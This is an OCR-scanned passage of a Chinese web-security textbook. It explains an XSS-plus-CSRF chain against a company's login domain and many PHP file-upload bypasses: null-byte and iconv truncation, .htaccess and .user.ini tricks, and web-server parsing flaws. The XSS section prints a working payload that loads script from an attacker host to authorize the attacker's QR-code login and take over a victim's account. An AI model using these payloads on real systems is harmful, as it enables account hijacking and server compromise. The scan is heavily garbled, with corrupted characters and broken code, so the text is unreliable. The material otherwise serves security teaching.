到 自己 的 服务 器 。 最 后 服务 器 收 到 带 着 flag 的 请 求 ， 见 图 2-3-33。flag 就 在 上 传 文件 的 响应 中 。 


elold A FALL :eel AI: ty/ A EA. 1 -p 7778 
[A 1S fun 2333333%7D HTTP/1L.1 
a/5.0 Lhrome(phantomjs) for Octf2017 by md5 salt 


图 2-3-33 
2. 某 互 联网 企业 XSS 


passport.example.com 和 wappass.example.com 是 该 公司 的 通行 证 相关 域 ， 负 责 用 户 的 通行 证 相关 
任务 。 例 如 ， 携 市 令 牌 跳 转 到 其 他 子 域 进行 授权 登录 ，wappass 子 域 负责 二 维 码 登录 相关 功能 ， 可 以 
在 这 个 域 进行 密码 更 改 等 。 


以 前 也 控 据 到 一 些 URL 校 验 不 严 导致 携 市 XXUSS 跳 转 到 第 三 万 域 的 安全 问题 。XXUSS 曾 是 他 们 公司 的 
:mA = | 
于 域名 的 校 验 极其 严格 ,但 存在 利用 的 可 能 ， 如 找到 日 名 单子 域 的 XSS 或 者 可 以 市 出 referer 的 页 面 : 


全 
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转 ， 也 可 以 是 form 表 单 ; tpl 参数 是 指 本 次 跳 转 到 具体 的 什么 服务 ， 这 个 是 服务 名 的 缩写 ; Uu 人 参数 则 是 
这 个 服务 对 应 的 授权 URL。 


经 过 测试 发现 ，302 跳 转 直 接 是 带 着 通行 证 302 重 定向 到 子 域 ; form 表 单 则 返回 一 个 自动 提交 的 表单 
上 且 action 为 子 域 ， 参 数 为 认证 参数 。 

这 次 的 问题 就 出 在 表单 跳 转 处 。 上 面 提 到 对 于 u 参 数 中 的 域名 校 验 很 严格 ， 但 是 对 于 协议 名 校 验 并 不 
严格 。 例 如 : 

这 样 的 协议 名 是 可 以 正确 返回 响应 头 的 ， 却 是 302 跳 转 过 来 的 链接 。 如 果 不 是 合法 的 HTTP (S) 协 
议 ， 链 接 是 不 会 被 浏览 器 所 接受 的 ， 所 以 类 似 : 


https://passport .example.com/v3/Login/api/auth/?return_type=5&tpl=bp&u=javascript:alert(1) 


这 样 的 URL 是 不 可 能 弹 框 的 ， 以 上 是 所 有 的 已 知事 情 。 


但 是 ， 在 Javascript 中 如 果 有 这 样 的 URL， 那 么 是 可 以 攻击 的 : 


浏览 器 中 ， 如 果 JavaScript 调 用 了 “javascript: ” 伪 协 议 ， 那 么 后 面 的 语句 可 以 直接 在 当前 页 面 当 作 
脚本 执行 类 似 如 下 代码 也 是 可 以 的 。 


document.location.href="javascript://www.example.com/%250aalert(1)"; 


这 样 的 payload 依 然 可 以 执行 ， 因 为 “//” 在 JavaScript 中 代表 的 意思 是 注释 ， 通 过 后 面 的 “%0a” 
换行 符 ， 使 得 攻击 语句 跑 到 第 2 行 ， 就 避 开 了 这 个 注释 符 。 似 乎 只 要 是 JavaScript 型 的 跳 转 ， 就 都 可 以 
触 友 JavaScript 伪 协议 ? form 表 单 是 否 也 可 以 看 作 一 种 携带 着 数据 进行 JavaScript 跳 转 的 方式 ? 


测试 代码 如 下 ， 结 果 见 图 2-3-34。 


<form action="javascript:alert(1)" method="POST" id="xss"></form> 
<script> 

document .getElementById("xss").submit(); 
</script> 


/private/tmp/a.html 


图 2-3-34 


结果 如 预期 般 弹 窗 了 。 也 丈 是 说 ， 只 要 是 上 自动 提交 的 表单 ， 如 果 action 中 的 协议 和 URL 后 半 段 可 控 ， 
束 能 得 到 一 个 XSS。 这 时 ， 结 合 前 的 修复 不 算 完 全 的 漏洞 : “Javascript 型 跳 转 ， 域 名 不 可 控 ， 但 是 
协议 和 URL 可 控 ”， 那 么 束 得 到 了 一 个 该 公司 登录 域 的 XSS， 见 图 2-3-35。 


这 样 便 通 过 了 URL 校 验 ， 见 图 2-3-36， 成 功 执行 了 我 们 的 XSS 代 码 。 


type=4&tpl=bp&u=javascript://openapi esien com/%250aalert(1 
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图 2-3-36 
此 时 ， 我 们 得 到 了 一 个 该 企业 登录 域 的 XSs 并 可 以 无 视 浏览 器 的 过 滤 、 各 种 浏览 器 ， 前 面 提 到 该 
企业 的 二 维 码 登录 功能 在 此 域 实 现 。 那 么 我 们 得 到 了 这 个 XS9， 融 可 以 对 用 户 进 行 CSRF 攻 击 ， 让 用 户 
在 访问 我 们 的 恶意 页 面 的 时 候 相 当 于 完成 了 对 登录 二 维 码 进行 扫 摘 和 确认 的 动作 。 


诱导 用 户 访问 的 页 面 内 容 ， 代 码 如 下 : 


<iframe src="https://wappass. exampLe.com/v3/Login/apiVauth/?return_type=4&tpL=bp&u=javascript%3A// 
example.com/%250aeval (window.name)&notjump=1" name="document.write('<script 
src=https://apps.xxxx.com/Libs/jquery/2.1.4/jquery.min.js></script>'); 
document .write('<script src=https://xss.attack.com/xxx/attack.php?sign= 
<?php echo $_GET[sign];?>></script>');" style="display:none"></iframe> 


attack.php 内 容 如 下 : 


$.get('https://wappass.example.com/wp/?qrlogin&t=1526233652&error=0&sign=<?php echo 

$_GET[sign];?>&cmd=Login&Lp=pc&tpL=mn&uaonLy=&cLient_id=&adapter=3&traceid= 
&LiveAbitLity=l&credentiaLKey=l&deLiverpParams=l&suppcheck=1l&scanface=l&support_ 
photo=1' ,function(data) { 

token = data.match(/token: ‘'([\w]+)'/)[1]; 

sign = data.match(/sign: '([\w]+)'/)[1]; 

// alert(tokentsign); 

$.post("https://wappass. example.com/wp/?qrlogin&v=1526234914892", {"token":token, 

ssign":sign, "authsid:m" tb "nm" Lp pn traceld": "3}) 


上 述 代码 是 最 终 利 用 的 payload ， 当 用 户 访问 此 网 页 时 会 触 点 XS9， 并 且 通 过 CSRF 的 攻击 手法 ， 上 自动 
化 对 攻击 者 打开 的 一 个 二 维 码 登 录 页 面 进 行 授 权 。 


授权 完毕 ， 攻 击 者 就 可 以 在 浏览 器 登录 受害 者 的 账号 ， 进 而 以 对 万 身份 浏览 各 种 业务 。 


全 
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2.4 Web 文 件 上 传 漏洞 


文件 上 传 在 Web 业 务 中 很 常见 ， 如 用 户 上 传 头像 、 编 写 文 章 上 传 图 片 等 。 在 实现 文件 上 传 时 ， 如 果 后 
端 没有 对 用 户 上 传 的 文件 做 好 处 理 ， 会 导致 非常 严重 的 安全 问题 ， 如 服务 器 被 上 传 恶 意 木 马 或 者 垃圾 
文件 。 因 其 分 类 众多 ， 本 节 主 要 介绍 PHP 常 见 的 一 些 上 传 问题 。 


2.4.1 基础 文件 上 传 漏洞 


图 2-4-1 是 一 段 基 础 的 PHP 上 传代 码 ， 却 存在 文件 上 传 漏洞 。PHP 的 文件 上 传 通常 使 用 move 
_f 和 le 方法 配合 $_ FILES 变 量 实现 ， 图 中 的 代码 直接 使 用 了 用 户 上 传 文件 的 文件 名 作为 后 端 保 虹 训 
件 名 ,会 导致 任意 文件 上 传 漏洞 。 所 以 在 该 上 传 点 可 以 上 传 恶 意 PHP 脚 本 文件 ( 见 图 2-4-2) 。 


<?php 
hiules= $aELLESI 区 
file( $filel 





2.4.2 截断 绕 过 上 传 限 制 


2.4.2.1 00 截 断 


00 截 断 是 绕 过 上 传 限 制 的 一 种 常见 方法 。 在 C 语 言 0” 是 字符 串 的 结束 符 ， 如 果 用 户 能 够 传 入 
”， 束 能 够 实现 截断 。 


00 截 断 绕 过 上 传 限 制 适用 的 场景 为 ， 后 端 先 获取 用 户 上 传 文件 的 文件 名 ， 如 x.php\00.jpg， 再 根据 文 
件 名 获得 文件 的 实际 后 缀 jpg; 通过 后 绎 的 白 名 单 校 验 后 ， 最 终 在 保存 文件 时 发 生 截 断 ， 实 现 上 传 的 
文件 为 x.php。 


PHP 的 底层 代码 为 C 语 言 ， 自 然 存 在 这 种 问题 ， 但 是 实际 PHP 使 用 $_FILES 实 现 文 件 上 传 时 并 不 存在 00 
截断 绕 过 上 传 限 制 问 题 ， 因 为 PHP 在 注册 $_FILES 全 局 变量 时 已 经 产生 了 截断 。 上 传 文件 名 为 x. bop 
Jp9g 的 文件 ， 而 注册 到 $_FILES['name"] 的 变量 值 为 x.php， 根 据 该 值得 到 的 后 缀 为 php， 因 此 无 法 通 
过 后 缀 的 白 名 单 校 验 ， 测 试 截图 见 图 2-4-3 (文件 名 中 包含 不 可 见 字符 人 0”) 。 


PHP 处 理 上 传 请 求 的 部 分 调用 栈 如 下 : 


multipart_buffer_headers rfc1867.c:453 
rfc1867_post_handler rfc1867.c:803 
sapi_handle_post SAPI.c:174 
php_default_treat_data php_variables.c:423 
php_auto_gLobaLs_create_post php_v. 人 37 


到 A Nem ll mw = I 5 3 到 
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理 ， 得 到 header 结 构 体 : 


if (!multipart_buffer_headers(mbuff, &header)) { 


goto fileupload._done; 
J 


在 multipart buffer headers 方 法 中 存在 如 下 代码 : 


while ((line = get_line(self)) && line[8] != '\9') { 
/* add header to table */ 
char *value = NULL; 
if (php_rfc1867_encoding_translation()) { 
self->input_encoding = zend_multibyte_encoding_detector((const unsigned char *) line, 
strlen(line), self->detect_order, self->detect_order_size); 
} 
/* space beginning means same header */ 
if (lissp. a 久 放 所 { 
value = strchr(line, ':'); 
} 
if (value) { 


if (buf_value.c && key) { /* new entry, add the old one to the list */ 
smart_string_e(&buf_value); 


end_llist_add_eleme Wh J ， Sentry); 
i value.c = NULL; 
key = NULL; 


do { 
value++; 
} while (isspace(*value)); 


key = estrdup(Line)i 
smart_string_appends(&buf_value, value); 


} 
else if (buf_value.c) { /* If no ':' on the line, add to previous line */ 
smart_string_appends(&buf_value, line); 
} 
else { 
continue; 
1 
} 
if (buf_value.c && key) { /* add the last one to the List */ 
smart_string_e(&buf_value); 
entry .key = key; 
entry.value = buf_value.c; 
zend_llist_add_element(header, &entry); 
} 


从 boundary 中 逐 行 读 出 数据 ， 使 用 “: ”分 割 出 key 和 value; 当 处 理 filename 时 ，key 值 为 Content 
-Disposition，value 值 为 form-data; name= "file"; filename="a.php\0.jpg"; 然后 执行 smart 
String appends 宏 定义 的 最 终 实现 为 memcpy， 当 value 复 制 到 &buf value 时 ， “^\0” 造 成 了 截 
断 。 在 截断 后 ， 将 buf value.c 添 加 到 entry 中 ， 再 通过 zend llist add element 将 entry 添 加 到 
结构 体 中 。 


smart_string_appends(&buf_value, value) 


if ((cd = php_mime_get_hdr_value(header, "Content-Disposition"))) { 
char *pair = NULL; 
int end = 0; 


while (isspace(*cd)) { 
++cd i 


} 


while (x*cd && (pair = getword(mbuff->input_encoding, &cd, ';' 
char *key = NULL, *word = pair; 


while (isspace(*cd)) { 
++Cd; 


} 


if (strchr(pair, '=')) { 
key = getword(mbuff->input_encoding, &pair, '='); 
} 
else if (!strcasecmp(key, "filename")) { 
if (filename) { 
efree(filename); 
} 
fiLename = getword_conf(mbuff->input_encoding, pair); 
if (mbuff->input_encoding && internal_encoding) { 
unsigned char *new_filename; 
size_t new_filename_len; 
if ((size_t)-1 != zend_multibyte_encoding_converter(&new_filename, 
Snew_filename_len, (unsigned char *)filename, strlen(filename), 
internal_encoding, mbuff->input_encoding)) { 
efree(filename); 
filename = (char *)new_filename; 


用 于 注册 $FILES['name'] 的 filename 变 量 从 header 结 构 体 中 获得 ， 所 以 最 终 注册 到 $ FILEST[' 
'] 的 文件 名 为 产生 截断 后 的 文件 名 。 


Nam 


在 Java 中 ，jdk7u40 以 下 版 本 存在 00 截 断 间 题 ，7u40 后 的 版 本 ， 在 上 传 、 写 入 文件 等 操作 中 都 会 调用 


File 的 isinvalid() 方 法 判断 文件 名 是 否 合法 ， 即 不 允许 文件 名 中 含有 ““\0”， 如 果 文 件 名 不 合法 ,将 
抛 出 异常 退出 流程 。 


final boolean isInvalid() { 
if (status == null) { 
status = (this.path.indexOf('\u08000') < 0) ? PathStatus.CHECKED : PathStatus .INVALID; 


} 
return status == PathStatus.INVALID; 
} 


= 至 站 二 he - 一 一 = L 
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二 妆 了 央 一 = 汉 记 4 [人 2 
虽然 PHP 的 $_FILES 文 件 上 传 不 存在 00 截 断 绕 过 上 传 限制 的 问题 ， 不 过 在 文件 名 进行 字符 集 转 换 的 场 
景 下 也 可 能 出 现 截 断 绕 过 。PHP 在 实现 字符 集 转换 时 通常 使 用 iconv() 函 数 ，UTF-8 在 单字 节 时 人 允许 的 
字 待 范围 为 0x00 ~ 0x7F， 如 果 转 换 的 字符 不 在 该 学 围 内 ， 则 会 造成 PHP_ICONV_ERR ILLEGAL SEQ 
异常 ， 低 版 本 PHP 在 PHP ICONV ERR ILLEGAL SEQ 异 常 后 不 再 处 理 后 面 字符 造成 截断 问题 ， 见 图 2 
-4-4。 可 以 看 出 ， 当 PHP 版 本 低 于 5.4 时 ， 转 换 字符 集 能 够 造成 截断 ， 但 5.4 及 以 上 版 本 会 返回 false。 


图 2-4-4 
若 PHP 版 本 低 于 5.4， 只 要 out buffer 不 为 空 ， 无 论 err 为 何 值 都 能 正常 返回 ， 见 图 2-4-5。 








图 2-4-5 


而 当 PHP 版 本 为 5.4 及 以 上 时 ， 只 有 err 为 PHP_ICONV ERR SUCCESS 即 成 功 转换 且 out_buffer 不 为 
空 时 ， 才 会 正 剃 返回， 否则 返回 FALSE， 见 图 2-4-6。 


Sd: Ey PL DEES= 

名 单 判 断后 ， 如 果 有 对 文件 名 进行 字符 集 转 换 操 作 ， 那 么 可 能 出 现 安全 问题 。 例 如 ， 在 图 2-4- 7 中 可 

以 上 传 x.php\x99.jpg 文 件 ， 最 终 保存 的 文件 名 为 x.php ( 见 图 2-4-8) 。 实 际 案例 可 以 参见 http:// 
.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-lconv-Truncate。 及 








图 2-4-7 
一 
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2.4.3 文件 后 绥 黑 名 单 校 验 绕 过 


黑 名 单 校 验 上 传 文 件 后 级 ， 即 通过 创建 一 个 后 缀 名 的 黑 名 单列 表 ， 在 上 传 时 判断 文件 后 绎 名 是 否 在 黑 
名 单列 表 中 ， 在 黑 名 单 中 则 不 进行 任何 操作 ， 不 在 则 可 以 上 传 ， 从 而 实现 对 上 传 文件 的 过 渡 。 


2.4.3.1 上 传 文件 重 命 


测试 代码 见 图 2-4-9， 在 文件 名 重 命名 的 场景 下 ， 可 控 的 只 有 文件 后 缀 ， 通 常 使 用 一 些 比较 偏 门 的 可 
解析 的 文件 后 绎 绕 过 黑 名 单 限制 . 


PHP 常 见 的 可 执行 后 缀 为 phhp3、php5、phtml、pht 等 ，ASP 常 见 的 可 执行 后 缀 为 cdx、cer、asa 
等 ，JSP 可 以 尝试 jspx 等 。 见 图 2-4-10， 在 上 传 PHP 文 件 被 限制 时 ， 可 以 通过 上 传 PHTML 文 件 实现 绕 
过 ， 见 图 2-4-11 和 图 2-4-12。 


可 解析 后 缀 在 不 同 环境 下 不 尽 相 同 ， 需 要 多 党 试 一 些 后 缀 。 如 果 环 境 为 Windows 系 统 ， 那 么 可 以 党 
试 "php"、 "php: : $DATA"、 "php." 等 后 缀 ; 或 先 上 传 "a.php: .jpg"， 生 成 空 a.php 文 件 ， 再 上 
传 "a.ph<" 写 入 文件 内 容 。 在 Windows 环 境 下 ， 文 件 名 不 区 分 大 小 写 ， 而 in_array 区 分 大 小 写 ， 所 以 
可 以 尝试 大 小 写 后 缀 名 绕 过 黑 名 单 。 若 Web 服 务 器 配置 了 SS1， 还 可 以 党 试 上 传 SHTML、SHT 等 文件 


命令 执行 。 


图 2-4-9 


人 


图 2-4-10 


CE 


图 2-4-11 


ER 


图 2-4-12 


2.4.3.2 上 传 文件 不 重 命 


在 上 传 文件 不 重 命名 的 场景 下 ， 除 了 寻找 一 些 比较 偶 门 的 可 解析 的 文件 后 组 ， 还 可 以 通过 上 传 . 
或 .user.ini 本 置 文件 实现 绕 过 。 


[ee 


1. 上 传 .htaccess 文 件 绕 过 黑 名 单 


.htaccess 是 Apache 分 布 式 配 置 文件 的 默认 名 称 ， 也 可 以 在 Apache 主 配置 文件 中 通过 ee 
et [IN ET 
目 令 修 改 分 布 式 配 置 文件 的 名 称 。Apache 主 配置 文件 中 通过 AllowOverride 指 令 配置 .htaccess 文 


件 中 可 以 覆盖 主 配置 文件 的 那些 指令 ， 在 低 于 2.3.8 的 版 本 中 ，AllowOverride 指 令 默 认为 All， 在 2.3. 
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9 及 更 高 版 本 中 默认 为 None， 即 在 高 版 本 Apache 中 ， 默 认 情 况 下 .htaccess 已 无 任何 作用 。 不 过 即使 
AllowOverride 为 All， 为 了 避免 安全 问题 ， 也 不 能 覆盖 所 有 主 配置 文件 中 的 指令 ， 具 体 可 履 关 指令 可 


查看 : http://httpd.apache.org/docs/2.2/mod/directive-dict.html# Context。 人 在 低 于 2.3.8 版 本 
时 ， 因 为 默认 AllowOverride 为 all， 可 以 尝试 上 传 .htaccess 文 件 修 改 部 分 配置 ， 使 用 SetHandlel! 指 
令 使 php 解 析 指 定 文 件 ， 见 图 2-4-13。 

先 上 传 .htaccess 文 件 ， 配 置 Files 使 PHP 解 析 yu.txt 文 件 ， 见 图 2-4-14。 

再 上 传 yu.txt 文 件 到 当前 目录 下 ， 此 时 yu.txt 已 被 当做 PHP 文 件 解 析 。 

除了 上 文中 的 SetHandler application/x-httpd-php， 其 实 利用 方法 还 有 下 面 这 种 写法 : 


ph 
#AddHandtLer 指令 的 作用 是 在 文件 扩展 名 与 特定 的 处 理 器 之 问 建立 映射 
# 指 定 扩展 名 为 .php 的 文件 应 被 phhp5-srcipt 处 理 器 来 处 理 


具体 的 利用 万 了 式 与 上 文 相同 ， 在 此 不 再 痪 述 。 


图 2-4-13 





图 2-4-14 
2. 上 传 .user.ini 文 件 绕 过 黑 名 单 


自 PHP 5.3.0 起 支持 基于 每 个 目录 的 .htaccess 风 格 的 INI 文 件 ， 此 类 文件 仪 被 CGI/FastCGI SAPI 处 
理 ， 其 默认 文件 名 为 .user.ini。 当 然 ， 也 可 以 在 主 配置 文件 中 使 用 user _ini.filename 指 令 修 改 该 配置 
文件 名 。 


PHP 文 件 镶 执 行 时 ， 除 了 加 载 主 php.ini， 还 会 在 每 个 目录 下 扫 摘 INI 文 件 ， 从 被 执 行 的 PHP 文 件 所 在 
目录 开始 ， 一 直上 升 到 Web 根 目录 。 


同样 ， 为 了 保证 安全 性 ， 在 .userini 文 件 中 也 不 能 履 盖 所 有 php.ini 中 的 配置 。PHP 中 的 每 个 配置 都 有 
其 所 属 的 模式 ， 模 式 指 定 了 该 配置 能 在 哪些 地 方 被 修改 ， 见 图 2-4-15。 


PHP_INI_* 模式 的 定义 


PHP_INI_USER 可 在 用 户 脚本 (例如 ini_set()) 或 Windows 注册 表 ( 自 PHP 5.3 起 ) 以 及 .userini 中 设 定 
PS 有 可 在 php in; htaccess "ey i A - I ， E 


ttpd.conf 中 芒 帮 


图 2-4-15 
从 官方 手册 可 知 ， 配 置 存在 4 个 模式 ， 且 PHP INI PREDIR 模 式 只 能 在 php.ini、.htaccess、httpd. 
中 进行 配置 ， 但 是 在 实际 中 ，PHP_INI_PREDIR 模 式 的 配置 也 可 以 在 .useriini 文 件 中 进行 配置 ， 还 存 
在 一 种 php.ini only 模 式 。disable functions 就 是 php.ini only 模 式 ， 详 细 配 置 模式 可 以 从 官方 手册 
je 7AANANAN 朵 TELIITELA4TLTRTTNS 


在 PHP_ INI PERDIR 模 式 中 存在 两 个 特殊 的 配置 : auto append file、auto prepend file。auto 
r 
_file 配 置 的 作用 为 指定 一 个 文件 在 主 文件 解析 前 解析 ， auto append file 的 作用 为 指定 一 个 文 
件 在 主 文件 解析 后 解析 ， 见 图 2-4-16。 


olile 
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图 2-4-16 
在 实际 利用 时 ， 通 常会 使 用 auto prepend file。 获取 auto prepend file、auto append file 配置 
信息 后 ， 如 果 prepend flle_p 不 为 空 ， 则 先 调用 zend execute scripts 解 析 prepend file p， 再 调用 
zend execute scripts 解 析 primary file ( 主 文件 ) 和 append file_p。 


由 于 append file p 最 后 被 执行 ， 如 果 在 解析 primary file 的 opcode 时 出 现 Fatal error 或 exit， 那 么 
appen 
file_p 不 再 会 处 zend_execute scripts 解 析 。 


不 过 使 用 .user.ini 配 置 文 件 绕 过 上 传 黑 名 日 有 着 很 大 的 局 限 性 。 从 上 可 以 看 出 ， 只 有 在 当前 目录 下 有 
文件 被 执行 时 ， 才 会 加 载 当前 目录 下 的 .user.ini 文 件 ， 而 在 上 传 目 录 下 通常 不 会 仓 在 PHP 文 件 ， 绕 
过 见 图 2-4-17。 


图 2-4-17 
乞 上 传 配置 文件 ， 配 置 在 主 文件 解析 前 解析 yu.txt 文 件 ， 见 图 2-4-18。 上 传 yu.txt 文 件 ， 访 问 当前 目 


录 下 的 任意 PHP 文 件 ， 见 图 2-4-19。 在 解析 upload.php 文 件 前 ， 先 解析 yu.txt 文 件 ， 成 功 触发 a 
oJa]ellalie) 
0。 


图 2-4-19 


2.4.4 文件 后 缀 日 名 单 校 验 绕 过 


白 名 单 校 验 文件 后 缀 比 黑 名 单 校 验 更 安全 、 普 遍 ， 绕 过 白 名 单 通常 需要 借助 Web 服 务 器 的 各 解析 漏洞 
或 ImageMagick 等 组 件 漏洞 。 
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2.4.4.1 Web 服 务 器 解析 漏洞 


1. ls 解析 漏洞 


IS 6 中 人 存在 两 个 解析 漏洞 : “*.asp” 文 件 夹 下 的 所 有 文件 会 被 当做 脚本 文件 进行 解析 ， 文 件 名 为 “ 

U 
.asp; ajpg” 的 文件 会 被 解析 为 ASP 文 件 ， 上传“x.asp，a.jpg” 文 件 获 取 到 的 后 级 为 jpg， 能 名 
通过 白 名 单 的 校 验 。 


2 . Nginx 解 析 漏 洞 


Nginx 的 解析 漏洞 为 配置 不 当 造 成 的 问题 ， 在 Nginx 未 配置 try files 上 且 FPM 未 设置 security.limit et 
extensions 
的 场景 下 ， 可 能 出 现 解析 漏洞 。Nginx 的 配置 如 下 : 


Location ~ \.php$ { 
# try_files $uri =404; 
fastcgi_pass 
Unix:/Applications/MAMP/Library/Logs/fastcgi/nginxFastCGI_php5.3.14.sock; 
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
include /Mpplications/MAMP/conf/nginx/fastcgi_params; 


先 上 传 xjpg 文 件 ， 再 访问 xjpg/1.php，location 为 .php 结 尾 ， 会 交 给 FPM 处 理 ， a 
_name 的 值 为 xjpg/1.php; 在 PHP 开 启 cgi.fix pathinfo 配 置 时 ，x.jpg/1.php 文 件 不 存在 ， a 
去 挥 最 右边 的 “/” 及 后 续 内 容 ， 继 续 判 断 xjpg 是 否 存 在 ; 这 时 若 xjpg 存 在 ， 则 会 用 PHP 处 理 该 
文件 ， 如 果 FPM 没 有 配置 security.limit_extensions 限 制 执行 文件 后 缀 必须 为 phhp， 则 会 产生 解析 漏 

US pA 


图 2-4-20 


pe 


1. 多 后 缀 文件 解析 漏洞 


在 Apache 中 ， 单 个 文件 广 持 拥有 多 个 后 缀 ， 如 果 多 个 后 缀 都 存在 对 应 的 handler 或 media-type， 那 
么 对 应 的 handler 会 处 理 当 前 文件 。 


人 在 AddHandler application/x-httpd-php.php 配 置 下 ，x.php.xxx 文 件 会 使 用 application/x-httpd- 
php 处 理 当 前 文件 ， 见 图 2-4-21。 


2-4-21 
AddType application/x-httpd-php .php 
# 


# TypesConfig points to the file containing the list of mappings from 
# filename extension to MIME-type. 


## 
TypesConfig /Applications/MAMP/conf/apache/mime.types 


在 以 上 Apache 配 置 下 ， 当 使 用 AddType ( 非 之 前 的 AddHandler) 时 ， 多 后 级 文件 会 从 最 右 后 级 开 
台 识 别 ， 如 果 后 缀 不 存在 对 应 的 MIME type 或 Handler， 则 会 继续 往 左 识别 后 经 ， 直 到 后 缀 有 对 应 的 
MIME type 或 Handler。x.php.xxx 文 件 由 于 xxx 后 缀 没有 对 应 的 handler 或 mime type， 这 时 往 左 识 
别 出 PHP 后 级 ， 就 会 将 该 文件 交 给 application/x-httpd-php 处 理 ， 见 图 2-4-22。 如 果 白 名 单 中 存在 
J EES A Ea 
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2. Apache CVE-2017-15715 漏 洞 


浏览 https://cve.mitre.org/cgi-bin/cvename.cgi? name=CVE-2017-15715， 根 据 该 CVE 的 摘 
述 可 以 看 出 ， 在 HTTPD 2.4.0 到 2.4.29 版 本 中 ，FilesMatch 指 令 正 则 中 “$” 能够 匹配 到 换行 符 ， 可 能 
导致 黑 名 单 绕 过 。 


图 2-4-22 


p$> 
andLer application/x-httpd-php 
</FilesMatch> es 


以 上 Apache 配 置 ， 原 意 是 只 解析 以 .php 结 尾 的 文件 ， 但 是 由 于 15715 漏 洞 导 致 .phpNn 结 尾 的 文件 也 
能 被 解析 ， 那 么 可 以 上 传 x.php\n 文 件 绕 过 黑 名 单 。 不 过 在 PHP $_FILES 上 传 的 过 程 中 ，$_FILES[ 
Name 
'] 会 清除 “\n” 字 符 导 致 不 能 利用 ， 这 里 使 用 file_put_contents 实 现 上 传 ， 测试 代码 见 图 24- 


图 2-4-23 
在 以 上 代码 中 ， 上 传 PHP 文 件 失败 ， 见 图 2-4-24。 

图 2-4-24 
上 传 x.php\n 文 件 可 以 成 功 ， 见 图 2-4-25。 


四 


2.4.5 文件 禁止 访问 绕 过 


在 测试 中 经 常会 遇 到 一 些 允许 任意 上 传 的 功能 ， 在 访问 上 传 的 脚本 文件 时 才 友 现 并 不 能 被 解析 或 访 
问 ， 通 常 是 在 Web 服 务 器 中 配置 上 传 目 录 下 的 脚本 文件 禁止 访问 。 在 上 传 目 录 下 的 文件 无 法 被 访问 
aD = ED = 
法 对 于 $_FILES 上 传 是 不 能 实现 的 ， 因 为 PHP 在 注册 $FILES['name'] 时 调用 basename() 方 法 处 理 了 
文件 名 ， 见 图 2-4-26 和 图 2-4-27。 





图 2-4-26 
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图 2-4-27 
_basename 方 法 会 获得 最 后 一 个 "/" 或 只 "后 面 的 字符 ， 所 以 上 传 ./x.php 文 件 并 不 能 够 实 
越 ， 因 为 在 经 过 basename 后 注册 到 FILES['"name'"] 的 值 为 x.php。 


2.4.5.1.htaccess 禁 止 脚本 文件 执行 绕 过 


低 于 9.22 版 本 的 jQuery-File-Upload 在 目 市 的 上 传 脚本 (server/php/index.php) 中 ， 验 证 上 传 文 
件 后 缀 使 用 的 正则 为 : 


也 融 是 允许 任意 文件 上 传 。 之 所 以 有 底气 允许 任意 文件 上 传 ， 是 因为 在 它 的 上 传 目录 下 目 市 .htaccess 
文件 配置 上 传 的 脚本 文件 无 法 被 执行 。 


r default-handler 
os cation/octet-stream 
set Content-Disposition attachment 
# 二 pe ollowing unse pt the forced type and Content-Disposition headers 
# for known image 
<FilesMatch Dv ee ?glpng)$"> 
ForceType n 
Header unset Mt ontent-Disposition 
</FilesMatch> 


# The following directive prevents browsers from MIME-s a the content-type. 
# This is an important complement to the ForceType directive 

Header set X-Content-Type-Options nosniff 

# Uncomment the following lines to prevent unauthorized download of files: 
#AuthName "Authorization required" 

#AuthType Basic 

#require valid-user 


但 是 从 Apache 2.3.9 起 ，AllowOverride 默 认为 None， 所 以 在 .htaccess 下 任何 指令 都 不 能 使 用 ， 这 
里 的 SetHandler、ForceType 指 令 也 束 毫 无 作用 ， 和 直接 上 传 PHP 文 件 即 被 执行 。 后 续 官方 将 正则 修改 
为 'accept file types'=>' 八 . (gifljpe? glpng) $/i', 


2.4.5.2 文件 上 传 到 Oss 


随 着 云 对 象 仓储 的 友 展 ， 越 来 越 多 的 网 站 选择 把 文件 上 传 到 ODSs 中 。 当 然 ， 上 传 到 oss 中 的 脚本 文件 

会 被 服务 端 解析 ， 所 以 很 多 开发 者 在 文件 上 传 到 OSSs 时 会 允许 任意 文件 上 传 。 虽 然 服务 端 不 会 解析 
脚本 文件 ， 但 是 可 以 通过 上 传 HTML、SVG 等 文件 让 浏览 器 解析 实现 XSS。 不 过 XSS 在 aliyuncs.com 
域 下 并 没有 什么 用 。 


不 过 现在 Oss 都 会 提供 绑 定 域名 功能 ， 见 图 2-4-28， 很 多 网 站 会 把 OSs 绑 在 自己 的 二 级 域名 下 ， 这 时 
上 传 HTML 文 件 导 至 的 XSS 丈 能 利用 了 ， 这 里 不 再 芍 述 。 


ZZ 您 可 提交 本 和 单 ， 猴 后 手动 前 往 才 名 利 折 相处 做 CNAME 解 斩 向， 域名 业 定 才能 生效 。 请 参 
ME 解 新 卫 肋 . 
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图 2-4-28 


2.4.5.3 配合 文件 包含 绕 过 


在 PHP 文 件 包含 中 ， 程 序 一 般 会 限制 包含 的 文件 后 缀 只 能 为 “.php” 或 其 他 特定 后 弘 ， 见 图 2-4-29。 
在 00 截 断 越 来 越 罕见 的 今天 ， 如 果 上 传 目录 脚本 文件 无 法 被 访问 或 不 被 解 析 ， 见 图 2-4-30， 那 么 可 以 
上 传 一 个 PHP 文 件 配 合 文件 包含 实现 解析 ， 见 图 2-4-31。 


图 2-4-29 


图 2-4-30 


图 2-4-30 ( 续 ) 


图 2-4-31 
类 似 的 场景 还 有 SSsTI， 常 为 用 户 选 择 可 以 加 载 的 模板 ， 但 是 模板 文件 后 缀 通 单 会 被 写 死 ， 所 以 这 时 可 
以 通过 任意 文件 上 传 模 板 文 件 ， 然 后 演 染 上 传 的 模板 实现 SSTI。 例 如 : http://www.yulegeyu. 
C 
/2019/02/15/SsSome-vulnerabilities-in-JEECMSV9/。 


om 


2.4.5.4 一 些 可 被 绕 过 的 Web 配 置 
上 传 目 录 中 禁止 文件 执行 通常 在 Web 服 务 器 中 配置 ， 在 不 当 配 置 下 可 能 存在 绕 过 。 
1. pathinfo 导 致 的 绕 过 问题 


Ne ll :Si 


Location ~ /upload/.*\.(phplphpS|phtml|pht)$ { 
deny all; 


} 
location ~ \.php(/|$) { 
les $uri 
fastcgi_pass 
unix:/Applications/MAMP/Library/logs/fastcgi/nginxFastCGI_php5.4.45. sock; 


fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
include /Applications/MAMP/conf/nginx/fastcgi_params; 


